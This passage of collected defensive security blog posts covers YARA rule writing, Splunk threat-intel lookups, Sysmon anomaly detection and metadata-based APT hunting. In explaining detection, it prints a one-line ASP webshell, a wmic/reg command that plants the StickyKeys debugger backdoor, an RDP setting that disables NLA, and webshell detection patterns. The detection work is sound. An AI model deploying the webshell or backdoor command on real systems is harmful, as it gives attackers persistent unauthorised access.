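    return bool(hits) and hits[-1] >= len(data) - window


def distance(data: bytes, first: bytes, second: bytes):
    """Offset of the first `second` hit minus offset of the first `first` hit, or None."""
    a, b = data.find(first), data.find(second)
    return None if -1 in (a, b) else b - a


if __name__ == "__main__":
    sample = b"A" * 1000 + b"EXPORT1" + b"B" * 10 + b"EXPORT2"
    print(in_tail(sample, b"EXPORT2", 50), distance(sample, b"EXPORT1", b"EXPORT2"))
```

A string that appears only near the end of a large file, or at a fixed distance from another string, is a much stronger indicator than the same string anywhere in the file.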
Webshell Code PHP

The variable name “$code” is more likely to change than the function combination “@eval(gzinflate(base64_decode(” at the end of the file. Legitimate PHP code may contain “eval(gzinflate(base64_decode(” somewhere, but it is less likely to occur in the last 50 bytes of the file.
I therefore wrote the following rule:

rule Webshell_b374k_related_1 {
    meta:
        description = "Detects b374k related webshell"
        author = "Florian Roth"
        reference = "https://goo.gl/ZuzV2S"
        score = 65
        hash = "d5696b32d32177cf70eaaa5a28d1c5823526d87e20d3c62b747517c6d41656f7"
        date = "2015-10-17"
    strings:
        $m1 = "<?php"
        $s1 = "@eval(gzinflate(base64_decode(" ascii
    condition:
        $m1 at 0 and $s1 in (filesize-50..filesize) and filesize < 20KB
}
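To make the semantics of `at` and `in` explicit, here is a rough Python approximation of the condition above. It is a sketch for illustration, not a replacement for YARA. It assumes that `$s1 in (filesize-50..filesize)` is satisfied when at least one occurrence of the string starts inside that inclusive window. It also checks the file size before searching, which does not change the result.

```python
def matches_b374k_related(data: bytes) -> bool:
    """Approximate the condition of Webshell_b374k_related_1 in plain Python."""
    marker = b"@eval(gzinflate(base64_decode("
    filesize = len(data)
    # $m1 at 0: the file must start with "<?php"
    if not data.startswith(b"<?php"):
        return False
    # filesize < 20KB (YARA's KB suffix multiplies by 1024)
    if filesize >= 20 * 1024:
        return False
    # $s1 in (filesize-50..filesize): at least one hit must start in that window
    start = data.find(marker)
    while start != -1:
        if filesize - 50 <= start <= filesize:
            return True
        start = data.find(marker, start + 1)
    return False


tail_hit = b"<?php $code='abc'; @eval(gzinflate(base64_decode($code)));"
early_hit = b"<?php @eval(gzinflate(base64_decode($x))); /*" + b"x" * 100 + b"*/"
print(matches_b374k_related(tail_hit))   # True
print(matches_b374k_related(early_hit))  # False
```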

Performance Guidelines

I collected many ideas from Wesley Shields and Victor M. Alvarez and composed a gist called “Yara Performance Guidelines”. This guide shows you how to write Yara rules that use fewer CPU cycles, by avoiding CPU-intensive checks and by using the new condition-checking shortcuts introduced in Yara version 3.4.
Yara Performance Guidelines

PE Module

People sometimes ask why I don’t use the PE module. The reason is simple: I avoid modules that are rather new, and I would like to see them thoroughly tested before using them in scanners running in production environments. It is a great module and a lot of effort went into it, so I would always recommend using it in lab environments or sandboxes. In scanners that walk huge directory trees, however, a minor memory leak in one of the modules could lead to severe memory shortages. I’ll give it another year to prove its stability and then start using it in my rules.

yarGen

Since the last minor version, yarGen has an opcode feature. It is active by default but only useful in cases in which not enough strings could be extracted.
I currently use the following parameters to create my rules:

python yarGen.py --noop -z 0 -a "Florian Roth" -r "http://link-to-sample" /mal/malware

The problem with the opcode feature is that it requires about 2.5 GB of additional main memory during rule creation. I’ll change it to an optional parameter in the next version.

yarAnalyzer

yarAnalyzer is a rather new tool that focuses on rule coverage. After creating a bigger rule set or a generic rule that should match on several samples you’d like to check the coverage of your rules in order to detect overlapping rules (which is often OK).
yarAnalyzer helps you get an overview of:

  • rules that match on more than one sample
  • samples that show hits from more than one rule
  • rules without hits
  • samples without hits

Yara Rule Analyzer

yarAnalyzer Screenshot


yarAnalyzer Github Repository

String Extraction and Colorization

To review the strings in a sample I use a simple shell one-liner that a good friend sent me once.
“strings” version for Linux

#!/bin/bash
(strings -a -td "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; strings -a -td -el "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

“gstrings” version for OS X (sudo port install binutils)

#!/bin/bash
(gstrings -a -td "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; gstrings -a -td -el "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

It produces output like that shown in the screenshot above (green text, captioned “Malware Strings”): the offset, ASCII (A) or wide (W), and the string at that offset.
To colorize the strings, check out my new tool “prisma”, which colorizes arbitrary standard output.
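If GNU binutils are not at hand, the `strings` one-liner above can be approximated in Python. This sketch makes two assumptions: a string is a run of at least 4 printable ASCII characters (0x20 to 0x7E), and a wide string is the same run encoded as UTF-16LE. The character set of GNU `strings` differs slightly, so the output will not be identical.

```python
import re

# Runs of at least 4 printable ASCII characters (approximation of GNU strings)
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
# The same runs encoded as UTF-16LE: printable byte followed by a zero byte
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(data):
    """Return (offset, 'A' or 'W', text) tuples sorted by offset."""
    results = [(m.start(), "A", m.group().decode("ascii")) for m in ASCII_RE.finditer(data)]
    results += [(m.start(), "W", m.group().decode("utf-16-le")) for m in WIDE_RE.finditer(data)]
    return sorted(results)


def print_strings(path):
    """Print offset, type and string, similar to the shell one-liner."""
    with open(path, "rb") as handle:
        for offset, kind, text in extract_strings(handle.read()):
            print(f"{offset:7d} {kind} {text}")
```

Calling `print_strings("sample.exe")` prints one line per string, ordered by offset like `sort -n` in the shell version.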

Prisma STDOUT colorization

Contact

Follow me on Twitter: @Cyb3rOps

Splunk Threat Intel IOC Integration via Lookups

Today most security teams have access to a lot of different information sources. On the one hand they collect log data from different sources and try to correlate them in a useful way in so-called SIEM systems. On the other hand they receive threat information from different sources like APT reports, public or private feeds or derive those indicators from their own investigations and during incident response.
Therefore one of the main tasks of security monitoring today is to combine these different data sources, which means to apply the threat intel information to the data that is already available in SIEM systems or scan for it on-demand using tools like my free IOC scanner LOKI or our APT Scanner THOR.
In this article I would like to describe a method to apply threat intel information to log data in Splunk using simple lookup definitions.
I recently integrated two different threat intel receivers in my free IOC scanner LOKI. One of them fetches all IOC (indicator of compromise) elements from AlienVault’s Open Threat Exchange platform OTX and saves them to a subfolder in the LOKI program folder in order to be initialized during startup.
This weekend I added a new option called “--siem” that instructs the receiver to generate a CSV file with a header line, in the correct format for a lookup definition in Splunk.
Example - Threat Intel Feed OTX Receiver (LOKI)

The resulting file for the hash IOCs looks like this:
Threat Intel CSV for Splunk Lookup

Threat Intel Hash CSV for Splunk Lookup


Using the “-o” parameter you are able to select an output folder. I chose the folder for the lookup definitions in the search app, which is “$SPLUNK_HOME/etc/apps/search/lookups”.
Threat Intel SIEM Integration CSV Lookup

Threat Intel CSV Files in Splunk Search App Lookup Folder


After saving the output files to this directory we can select the CSV file in the lookup definition settings dialog (Settings > Lookups > Lookup definitions > Add new). I named the lookup “otxhash”.
Splunk Threat Intel Integration Lookup Definition

Threat Intel CSV File Lookup Definition in Splunk


Now we can apply this lookup to all log data that contains file hash information like Antivirus logs, THOR and LOKI scan results or in this case the logs of Microsoft Sysmon.
Windows Sysmon Log Data in Splunk

With the free Add-on for Microsoft Sysmon, all log fields are extracted automatically. You will see a field named “Hash” that can be used in our search definitions for a direct lookup.
Windows Sysmon Log Data in Splunk

Windows Sysmon Log Data with Hash Values of Executables


The lookup compares the “Hash” field from the Sysmon event message with the “hash” field from the OTX threat intel CSV file and sets a new “threat_description” field with the value of the “description” field from the CSV.

index=windows_sysmon
| lookup otxhash hash AS Hash OUTPUT description AS threat_description
| search threat_description=*
| table UtcTime,ComputerName,User,Hash,ProcessId,CommandLine,threat_description

After the lookup, I search for all entries that have a “threat_description” field set and display them in an easy-to-read table view. Only entries whose “Hash” matches a “hash” from the CSV will have this new field set. In the example below, I had a match on an unwanted application called “Pantsoff” that I used in my lab environment for this POC.
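The lookup is an exact-match join. The following Python code sketches the same logic outside Splunk. It reads a CSV with `hash` and `description` columns and adds `threat_description` to every event whose `Hash` matches. The CSV row and the events are made-up placeholders. Lower-casing both sides is a choice of this sketch, not necessarily how your Splunk lookup is configured.

```python
import csv
import io


def load_lookup(csv_text):
    """Build a hash -> description dict from CSV text with 'hash' and 'description' columns."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row["hash"].lower(): row["description"] for row in reader}


def apply_lookup(events, lookup):
    """Keep only events whose Hash has an exact match and add threat_description."""
    matched = []
    for event in events:
        description = lookup.get(event.get("Hash", "").lower())
        if description is not None:  # like `search threat_description=*`
            matched.append({**event, "threat_description": description})
    return matched


CSV_TEXT = "hash,description\naaaa1111,Example OTX pulse\n"
events = [
    {"ComputerName": "WS01", "Hash": "AAAA1111", "CommandLine": "evil.exe"},
    {"ComputerName": "WS02", "Hash": "BBBB2222", "CommandLine": "notepad.exe"},
]
for hit in apply_lookup(events, load_lookup(CSV_TEXT)):
    print(hit["ComputerName"], hit["Hash"], hit["threat_description"])
```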

Threat Intel CSV Lookup in Splunk

Threat Intel Lookup in Splunk


I would define this search as an “Alert” that runs every 15 minutes and searches the log data of the last 15 minutes, so that you are informed immediately if a blacklisted executable has been used (avoid real-time searches and alerts in Splunk).
Furthermore, the threat intel receiver should be scheduled via cron to run hourly or daily.
The two other files created by the threat intel receiver contain information on filenames and C2 servers (hostnames, IPs) that can be applied in a similar way. The only small drawback is that lookups only support exact (“equal”) matches and don’t allow searching for elements that “contain” a value from the CSV file. This is no problem for the C2 server definitions, but it is for the filename definitions, which can be partial paths such as “AppData\\evil.exe”.
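Until such a mode exists, the “contains” comparison for filename IOCs can be done outside the lookup. The following Python sketch assumes the filename IOCs are plain path fragments (written here with a single backslash) and that a case-insensitive substring match is acceptable. The paths are made-up examples.

```python
def match_filename_iocs(image_paths, ioc_fragments):
    """Return (path, fragment) pairs where a path contains a filename IOC fragment."""
    fragments = [fragment.lower() for fragment in ioc_fragments]
    hits = []
    for path in image_paths:
        lowered = path.lower()
        for fragment in fragments:
            if fragment in lowered:  # "contains" instead of "equal"
                hits.append((path, fragment))
    return hits


paths = [r"C:\Users\bob\AppData\evil.exe", r"C:\Windows\System32\cmd.exe"]
print(match_filename_iocs(paths, [r"AppData\evil.exe"]))
```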
I’ll improve the Threat Intel Receivers in the coming weeks and add the “--siem” option to the MISP Receiver as well.
I hope you enjoyed the article and found it inspiring even if you don’t use Splunk or the other mentioned tools.
Besides: I am working on a RESTful web service with the working title “TRON” that allows querying threat intel indicators. It supports different comparison modes, including the missing “contains” mode, and accepts OpenIOC and STIX files as input. It is not ready yet, but I’ll let you know as soon as there is something to show.
Follow me on Twitter via @Cyb3rOps

Detect System File Manipulations with SysInternals Sysmon

SysInternals Sysmon is a powerful tool especially when it comes to anomaly detection. I recently developed a method to detect system file manipulations, which I would like to share with you.
We know how to track processes with the standard Windows audit policy option “Audit process tracking”, but Sysmon messages contain much more information to evaluate. By using Sysmon on many systems within the network and collecting all the logs in a central location you’ll get a database full of interesting attributes and Metadata which can be statistically analyzed in order to identify anomalies.
Carlos Perez wrote a really good article on Sysmon, which you should check out if you’re new to Sysmon and its capabilities.

Anomaly Detection

In recent years, “anomaly detection” has often been used as a marketing buzzword and has lost some of its shine as a result. I am still a strong believer and often say things like “anomaly detection is the only method to detect yet unknown threats”. In security monitoring we call it anomaly detection, Antivirus vendors call it heuristics, and SPAM appliances express it as an “X-Spam-Score”.

Anomaly detection requires the ability to describe what is normal and exclude it from the evaluation.

With the data collected from the different Sysmon sources, this is an easy task. Sysmon provides the executable hash as MD5, SHA1 or SHA256 in the log entries, which enables an analyst to identify the few different versions of a certain system executable. The hash of a system program like “cmd.exe” executed on different systems in your domain should always be the same on all systems running the same version of Windows. Let me give you some examples.
For “cmd.exe”, the analysis of a sane environment would look like this:

Hash - Image - Count
3C77C39347A6FA560A74587B0498FE84 - C:\WINDOWS\system32\cmd.exe - 56
AD7B9C14083B52BC532FBA5948342B98 - C:\Windows\System32\cmd.exe - 34

The following analysis includes an anomaly that is worth investigating:

Hash - Image - Count
3C77C39347A6FA560A74587B0498FE84 - C:\WINDOWS\system32\cmd.exe - 56
AD7B9C14083B52BC532FBA5948342B98 - C:\Windows\System32\cmd.exe - 34
D8B7B276710127D233ABCDB7313AAC36 - C:\WINDOWS\system32\cmd.exe - 1

Let’s take a look at two analysis examples in which I use this method to identify different anomalies.

Anomaly 1: “StickyKeys” backdoor and the like

I use my favorite log analysis system for the analysis, which is Splunk. Getting the Sysmon data into Splunk is easy, as there is already a Sysmon Add-on available in the App Store. Just use the deployment manager to push the Add-on to the Splunk Forwarders and install Sysmon (see my other blog post on Sysmon for more appropriate configuration options).
Then you can do things like this:

source="WinEventLog:Microsoft-Windows-Sysmon/Operational" NOT Image=*Sysmon.exe | dedup host,Image | stats distinct_count(Image) AS different_names, values(Image), values(host) BY Hash | sort -different_names

It gives you an overview of files with the same hash but different names. It is pretty easy to spot the manipulation.
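The same grouping can be sketched in Python, for example to try the idea on exported Sysmon events. This illustration rests on two assumptions. First, each event is a dict with `Hash` and `Image` keys, mirroring the Sysmon Add-on field names. Second, base names are compared case-insensitively, so that `C:\WINDOWS\system32\cmd.exe` and `C:\Windows\System32\cmd.exe` do not count as two names. The hash values are placeholders.

```python
import ntpath
from collections import defaultdict


def names_per_hash(events):
    """Map each hash to the distinct (lower-cased) file names it was executed under."""
    names = defaultdict(set)
    for event in events:
        name = ntpath.basename(event["Image"]).lower()
        if name == "sysmon.exe":  # mirrors NOT Image=*Sysmon.exe
            continue
        names[event["Hash"]].add(name)
    # Hashes seen under the most different names first, like `sort -different_names`
    return sorted(names.items(), key=lambda item: len(item[1]), reverse=True)


events = [
    {"Hash": "HASH_CMD", "Image": r"C:\Windows\System32\cmd.exe"},
    {"Hash": "HASH_CMD", "Image": r"C:\WINDOWS\system32\cmd.exe"},
    {"Hash": "HASH_CMD", "Image": r"C:\Windows\System32\sethc.exe"},
    {"Hash": "HASH_NOTEPAD", "Image": r"C:\Windows\System32\notepad.exe"},
]
for file_hash, names in names_per_hash(events):
    print(file_hash, sorted(names))
```

A hash that shows up as both `cmd.exe` and `sethc.exe` lands at the top of the list, which is exactly the manipulation the search is meant to surface.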

StickyKey Backdoor Detection with Splunk

StickyKey Backdoor Detection with Splunk and Sysmon


We detected a so-called “StickyKeys” backdoor: the system’s own “cmd.exe” copied over “sethc.exe”, which is located in the same folder and provides the Sticky Keys functionality right on the login screen. Replacing it with a system command line establishes a shell running as LOCAL_SYSTEM that pops up when you connect to a server via RDP and press Shift five times in a row (see this blog post for more information on this backdoor).

Anomaly 2: The Black Sheep

If you create the statistics by “Image” instead of “Hash” you’ll get an overview of the different versions of system files in use and are able to identify system file versions that are unique.
Look at the following example to get an impression of what can be done with this method.

source="WinEventLog:Microsoft-Windows-Sysmon/Operational" NOT Image=*Sysmon.exe | dedup host,Image | rex field=Image "(?<Executable>[^\\\]+)$" | eval Executable=lower(Executable) | stats count BY Executable,Hash | sort +count

I am sorry that I can’t give you a nice screenshot of what it would look like in a big environment. These are the results from only 3 different demo systems (Win2003, Win7 and Win8). To see what it would look like in an environment with hundreds or thousands of systems, see the listing below.

Sysmon Detection Splunk

Sysmon Anomaly Detection with Splunk


The result would look like this:

Hash - Image - Count
AD7B9C14083B52BC532FBA5948342B98 - cmd.exe - 1480
3C77C39347A6FA560A74587B0498FE84 - cmd.exe - 256
D8B7B276710127D233ABCDB7313AAC36 - cmd.exe - 2

Consider the image files with a low count as anomalies and try to figure out why the hash of the system executable differs from the variants on the other systems.
I would google the hash of the black sheep, which is “D8B7B276710127D233ABCDB7313AAC36”, and see if I can get more details. Contrary to what some may be inclined to believe, an empty Google result is NOT a good sign. If the Google results are ambiguous, try to figure out whether these systems are somehow special, e.g. certain readout systems running embedded OS versions, or systems that do not receive patches. If the findings are still suspicious, drop the samples in a sandbox and see how they behave.
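For a quick offline check of the black sheep idea, here is a Python sketch of the second search. It keeps one event per host and image (like `dedup host,Image`, but case-insensitive). It then counts the hosts per executable name and hash, and returns the rare combinations in ascending order. The `max_count` threshold of 2 and the event data are assumptions for illustration.

```python
import ntpath
from collections import Counter


def rare_versions(events, max_count=2):
    """Return (count, executable, hash) tuples seen on at most max_count hosts."""
    # One hash per host and image, similar to `dedup host,Image` (case-insensitive here)
    first_seen = {}
    for event in events:
        key = (event["host"], event["Image"].lower())
        first_seen.setdefault(key, event["Hash"])
    # Count hosts per (lower-cased executable name, hash)
    counts = Counter(
        (ntpath.basename(image), file_hash) for (_host, image), file_hash in first_seen.items()
    )
    # Rarest first, like `sort +count`
    return sorted(
        (count, exe, file_hash) for (exe, file_hash), count in counts.items() if count <= max_count
    )


events = [
    {"host": f"WS{i:02d}", "Image": r"C:\Windows\System32\cmd.exe", "Hash": "HASH_A"}
    for i in range(5)
]
events.append({"host": "SRV01", "Image": r"C:\WINDOWS\system32\cmd.exe", "Hash": "HASH_D"})
print(rare_versions(events))  # [(1, 'cmd.exe', 'HASH_D')]
```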
Hope you liked it. Please give me feedback if you actually tested this method in your environment so that I can improve the search statements or handle false positive conditions.

APT Detection is About Metadata

People often ask me why we changed the name of our scanner from “IOC” to “APT” scanner, and whether we did that only for marketing reasons. But don’t worry: this blog post is neither a sales pitch nor an attempt to create a new product class.
I’ll show you why APT detection is difficult – for the big players and spirited newcomers like us.

Metadata is the Key

Only recently did I recognize and name the methods that we have applied since we introduced the scoring system in our scanner product. Instead of looking at a file only by its content, we collect numerous attributes and calculate a score based on certain rules that indicate conspicuous features or anomalies.
What I recognized was that Metadata is the key to successful APT detection. Let me give you some examples.

The “Sticky Keys” Backdoor

During our investigations we found that the attackers used a simple backdoor that allowed them to avoid AV detection and use tools that were already available on the target systems. They copied a valid “cmd.exe” over the “sethc.exe” in the System32 folder. This established a backdoor that waits for the user to press Shift five times in a row on an RDP logon screen and then pops up a Windows command line running as LOCAL_SYSTEM. Another method sets the Windows command line as the debugger for the Sticky Keys binary.

wmic /user:username /password:secret /node:system1 process call create "C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f"

With the necessary rights it is easy to install and difficult to detect.

StickyKeys Backdoor APT

APT Detection StickyKeys Backdoor


As I already said, an Antivirus engine won’t detect this backdoor as the content of the file is a valid Windows executable with an intact signature. Windows 7+ users won’t stumble over it as they have Network Level Authentication (NLA) enabled by default, which prompts the user for username and password before fully establishing a Terminal Services connection. Attackers modify their local “default.rdp” file and add “enablecredSSPsupport:i:0:1” in order to disable this behaviour.
APT detection therefore means the following:

  • Check system files like the Sticky Keys binary for modifications. Don’t do this by comparing MD5 hashes from whitelist databases like the NSRL; compare the expected content for a certain file name with the actual content of the file. I described this method in a blog article, and Chad Tilbury from CrowdStrike described how to apply this method using their CrowdResponse tool.
  • Identify “default.rdp” files on server systems that have NLA disabled. (Administrators shouldn’t do that)
  • Check if the Windows command line (cmd.exe) is registered as a debugger for any program
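The first check can be sketched as a table of strings that a genuine file of a given name is expected to contain. In this Python sketch, the table is hypothetical. Its only entry (`sethc.exe` should contain "stickykeys") is taken from the Sticky Keys discussion in this article. Searching ASCII and UTF-16LE case-insensitively is an assumption, and the byte strings in the example are made up. A copied `cmd.exe` lacks the expected string and is flagged.

```python
import ntpath

# Hypothetical expectation table: file name -> strings a genuine file should contain
EXPECTED_STRINGS = {
    "sethc.exe": ["stickykeys"],
}


def content_matches_name(path, data):
    """Return False if a file lacks a string expected for its file name."""
    expected = EXPECTED_STRINGS.get(ntpath.basename(path).lower())
    if not expected:
        return True  # nothing known about this file name
    haystack = data.lower()  # bytes.lower() only changes ASCII letters
    for text in expected:
        ascii_form = text.lower().encode("ascii")
        wide_form = text.lower().encode("utf-16-le")
        if ascii_form not in haystack and wide_form not in haystack:
            return False
    return True


genuine = b"MZ" + "StickyKeys".encode("utf-16-le")
replaced = b"MZ" + b"Windows Command Processor"
print(content_matches_name(r"C:\Windows\System32\sethc.exe", genuine))   # True
print(content_matches_name(r"C:\Windows\System32\sethc.exe", replaced))  # False
```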

PsExec’s Evil Clone

I often use the example of the well-known Sysinternals tool “PsExec”, which is used by administrators and APT groups alike. It doesn’t make much sense to add it to the indicators of compromise (IOCs) of your triage sweep, although it may have played a substantial role in lateral attacker movement.
The human eye is able to distinguish between a PsExec that has been used for administration and a PsExec that has been used by the attackers. The essential difference between the two versions does not lie in the content of the file but in the Metadata.
Look at the following table and tell me which of the two files is valid and which has been placed on the system by the attackers. Remember, the file content is the same: the MD5 hashes of both files are equal.

Attribute             File 1                              File 2
MD5                   aeee996fd3484f28e5cd85fe26b6bdcd    aeee996fd3484f28e5cd85fe26b6bdcd
Filename              PsExec.exe                          p.exe
Path                  C:\SysInternals                     C:\TEMP
Owner                 Administrators                      LOCAL_SYSTEM
Modified Time Stamp   2013-02-10 09:22:04                 1970-01-01 00:00:00

It isn’t that difficult, is it?
APT detection therefore means the following:

  • Imitating the human point of view: pulling together all Metadata connected with an element, be it a file, a process or an event log message, and evaluating the legitimacy of the element based on all available Metadata attributes
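As a rough illustration of that idea, the following Python sketch scores the two PsExec copies from the table above. The attributes, the weights and the hash-to-name table are hypothetical. They only show how several weak Metadata signals add up; this is not the scoring used in THOR.

```python
import ntpath
from dataclasses import dataclass
from datetime import datetime

# Hypothetical knowledge base: MD5 -> expected file name of a known tool
KNOWN_NAMES = {"aeee996fd3484f28e5cd85fe26b6bdcd": "psexec.exe"}
TEMP_DIRS = {r"c:\temp", r"c:\windows\temp"}


@dataclass
class FileMeta:
    md5: str
    path: str
    owner: str
    modified: datetime


def suspicion_score(meta):
    """Add up made-up weights for suspicious Metadata attributes."""
    score = 0
    name = ntpath.basename(meta.path).lower()
    expected = KNOWN_NAMES.get(meta.md5.lower())
    if expected and name != expected:
        score += 40  # known tool under a different name
    if ntpath.dirname(meta.path).lower() in TEMP_DIRS:
        score += 20  # placed in a temporary folder
    if meta.owner.upper() in {"LOCAL_SYSTEM", "SYSTEM"}:
        score += 20  # file owned by the system account
    if meta.modified.year <= 1970:
        score += 30  # epoch-zero timestamp, often a sign of manipulation
    return score


file1 = FileMeta("aeee996fd3484f28e5cd85fe26b6bdcd", r"C:\SysInternals\PsExec.exe",
                 "Administrators", datetime(2013, 2, 10, 9, 22, 4))
file2 = FileMeta("aeee996fd3484f28e5cd85fe26b6bdcd", r"C:\TEMP\p.exe",
                 "LOCAL_SYSTEM", datetime(1970, 1, 1))
print(suspicion_score(file1), suspicion_score(file2))  # 0 110
```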

The Simplest Webshell

We often encounter so-called webshells that were placed in web server directories to establish a simple backdoor. Webshells can be very specific and therefore easy to detect. The C99 webshell is a good example of a PHP webshell; JspSpy is a well-known JSP webshell. Both are easily detected, even by Antivirus engines (see: C99 on VT, JSPSpy on VT).
However, APT groups tend to use two different types of webshells:

  • Tiny webshells
  • Code snippets with certain functions copied from legitimate software

There are a lot of well-known tiny webshells. The following one is my favorite. Add a space or change the request parameter “abc” to something else and the detection ratio is alarmingly low (Example). It allows an attacker to evaluate (execute) an arbitrary command on the web server. There are numerous blog posts and other articles describing what can be done with a webshell like this. However, the protection level provided by AV engines, firewalls and NIDS is almost zero.

<%eval request("abc")%>

Another method we discovered was the use of code snippets copied from blog entries or tutorial pages, which allowed the attackers to use only certain functions like “file upload” or “directory listing”.
They often exploit a weakness in web applications to upload and run their own scripts or even whole application containers (.war). By placing a known webshell like JspSpy into that web server folder, they would run the risk of being detected. What they really need is a distribution point for their toolset or a simple tool to execute code on the server (like a tiny webshell). We’ve seen simple upload scripts that provide nothing more than an upload function, which the attackers use to store their toolsets for lateral movement. A Google search for “upload jsp” revealed various scripts they used in their attacks. It’s obvious that AV engines won’t detect this type of threat. How could they? The attackers abuse benign pieces of code to establish malicious backdoors.
APT detection therefore means the following:

  • Use Metadata like file size, creation timestamp and file extension in combination with generic content detection rules, e.g. check for the string “eval” in a file smaller than 40 bytes with a script extension like “.jsp”.
  • Check the content of upload directories for the expected file types (and don’t use the extension to determine the file type)
  • Check web server processes for executables running in the web server directories – e.g. curl.exe in D:\Inetpub\wwwroot
  • Generate and send frequent reports on modified files within the web server directories
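The first check can be sketched in a few lines of Python. The extension list, the 40-byte limit and the case-insensitive "eval" match are assumptions taken loosely from the bullet above; tune them to your web servers.

```python
import os

# Assumed list of script extensions served by typical web servers
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".jsp", ".jspx", ".php"}


def is_tiny_webshell_candidate(filename, content, max_size=40):
    """Flag tiny script files that contain 'eval' (case-insensitive)."""
    extension = os.path.splitext(filename)[1].lower()
    return (
        extension in SCRIPT_EXTENSIONS
        and len(content) < max_size
        and b"eval" in content.lower()
    )


def scan_webroot(root, max_size=40):
    """Yield candidate files below a web root, e.g. D:\\Inetpub\\wwwroot."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) >= max_size:
                    continue  # skip large files without reading them
                with open(path, "rb") as handle:
                    content = handle.read()
            except OSError:
                continue  # unreadable or vanished file
            if is_tiny_webshell_candidate(name, content, max_size):
                yield path


print(is_tiny_webshell_candidate("shell.asp", b'<%eval request("abc")%>'))  # True
```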

The Heavy Burden of Definite Detection

One could be tempted to believe that I wrote this article to disparage Antivirus engines, but this isn’t the case. Antivirus solutions still play a key role and carry the heavy burden of definite detection. Their scan result has to be “thumbs up” or “thumbs down”, as there is no middle ground.
Years ago they introduced signatures to detect “Potentially Unwanted Applications” (PUA). Users or administrators decide what to do if one of these “dual use” tools has been found on a system. Handling thousands of events generated by the Antivirus agents is a difficult task, even with a central console or SIEM-integrated log files. It is easy to understand why PUA events do not play an important role in view of dozens of Trojan detections per day.

APT detection is the art of suspicion. A missing “stickykeys” string in the “sethc.exe” indicates a manipulation, a replaced system file. It is not a definite detection but the certainty that something is wrong.

Conclusion

Considering the given examples an attentive reader may be inclined to believe that Antivirus and simple IOC scanning (Triage) is not enough to defend against Advanced Persistent Threats. After the experiences of the last 3 years I have to confirm that assumption.
Who would recognize and report the execution of “sethc.exe” on a server system, the “PUA/PsExec” message generated by the Antivirus, or another JSP file on the web server?
I even doubt that so-called “APT solutions” are able to detect

  • a “.war”-file upload to a Tomcat server by the use of “tomcat/tomcat” as credentials,
  • encrypted file uploads,
  • lateral movement using PsExec, Powershell or WMIC and
  • “StickyKey” backdoor access via RDP.

An extensive security monitoring in form of a SIEM system allows you to detect a needle in the haystack but only if you are able to distinguish between straw and needles.

The question is: How can I define such soft indicators to detect the described anomalies? The OpenIOC framework already contains options to combine certain characteristics like filename and filesize, but rather than using it as a tool to describe anomalies it is often used to tighten the detection to the level of a hash value. I prefer hash values over “Name:PsExec.exe” combined with “Filesize:381816” because it doesn’t make you believe that you’re looking at a clever rule.
I therefore recommend the following:

  1. Assume compromise and start from there
    Ask yourself: How would I detect a breach? What if attackers already took control of the Windows Domain and worked with domain admin accounts? What if they worked with tools that my Antivirus is unable to detect?
  2. Use all Metadata you can get to determine the legitimacy of an element
    This does not only apply to files or processes in APT and IOC scanning, but also to the discipline of security monitoring. E.g. select interesting Antivirus events based on various characteristics, not only on the status that indicates whether the malware has been removed or not. Consider the location of the malware (Temporary Internet Files or System32 folder), the user account (restricted user, Administrator or LOCAL_SYSTEM), the malware type (JS/Redirector or PUA/PasswordDump), the system type (server or client workstation), the detection time (02:00 am with no one working the night shift) and the detected form (in a RAR archive or extracted). Develop similar schemes for other log types. The most interesting ones are Antivirus, Proxy and Windows logs.
    Useful Links:
    SysForensics published an article about process anomaly detection, which was adapted to other OS versions and included in our THOR APT Scanner and my LOKI IOC Scanner.
    Use SysInternals Sysmon to enrich your Windows log data.
  3. Don’t create detection rules that are too tight but concentrate on filtering the false positives
    If you regard filtering false positives as a pain in the neck you’re probably using the wrong SIEM system. (Warning – product placement: I prefer Splunk over all others, especially with the Enterprise Security App installed)
  4. Use IOCs from published APT reports to enrich your detection rules
    We use the APT reports to create new rules in our customers’ SIEM systems and as input for our APT scanner THOR.
    Useful Links:
    APT Notes is an IOC repository with hundreds of reports from recent years. You can download the GitHub repository from here.

How to Write Simple but Sound Yara Rules

During the last 2 years I wrote approximately 2000 Yara rules based on samples found during our incident response investigations. A lot of security professionals have noticed that Yara provides an easy and effective way to write custom rules based on strings or byte sequences found in their samples. It also allows them, as end users, to create their own detection tools.
However, it makes me sad to see that researchers mainly publish two types of rules:

  1. rules that generate many false positives and
  2. rules that match only the specific sample and are not much better than a hash value.

I therefore decided to write an article on how to build optimal Yara rules, which can be used to scan single samples uploaded to a sandbox and whole file systems with a minimal chance of false positives.
These rules are based on contained strings and are easy to comprehend. You do not need to know how to reverse engineer executables. I also decided to avoid the new Yara modules like “pe”, which I still consider “testing” features that may lead to memory leaks or other errors when used in practice.

Automatic Rule Generation

At first, I believed that automatically generated rules could never be as good as manually created ones. During my work on our IOC scanners THOR and LOKI, I had to create hundreds of Yara rules manually, and an obvious disadvantage of that approach became clear. What I used to do was extract UNICODE and ASCII strings from my samples with the following commands:

strings -el sample.exe
strings -a sample.exe

I prefer the UNICODE strings as they are often overlooked and less frequently changed within a certain malware/tool family. Make sure that you use UNICODE strings with the “wide” keyword and ASCII strings with the “ascii” keyword in your rules and use “fullword” if there is a word boundary before and after the string. The problem with this method is that you cannot decide if the string that is returned by the commands is unique for this malware or often used in goodware samples as well.
Look at the extracted strings in the following example:

NTLMSSP
%d.%d.%d.%d
%s\IPC$
\\%s
NT LM 0.12
%s%s%s
%s.exe %s
%s\Admin$\%s.exe
RtlUpcaseUnicodeStringToOemString
LoadLibrary( NTDLL.DLL ) Error:%d

Can you be sure that the string “NT LM 0.12” is unique and not used by legitimate software?
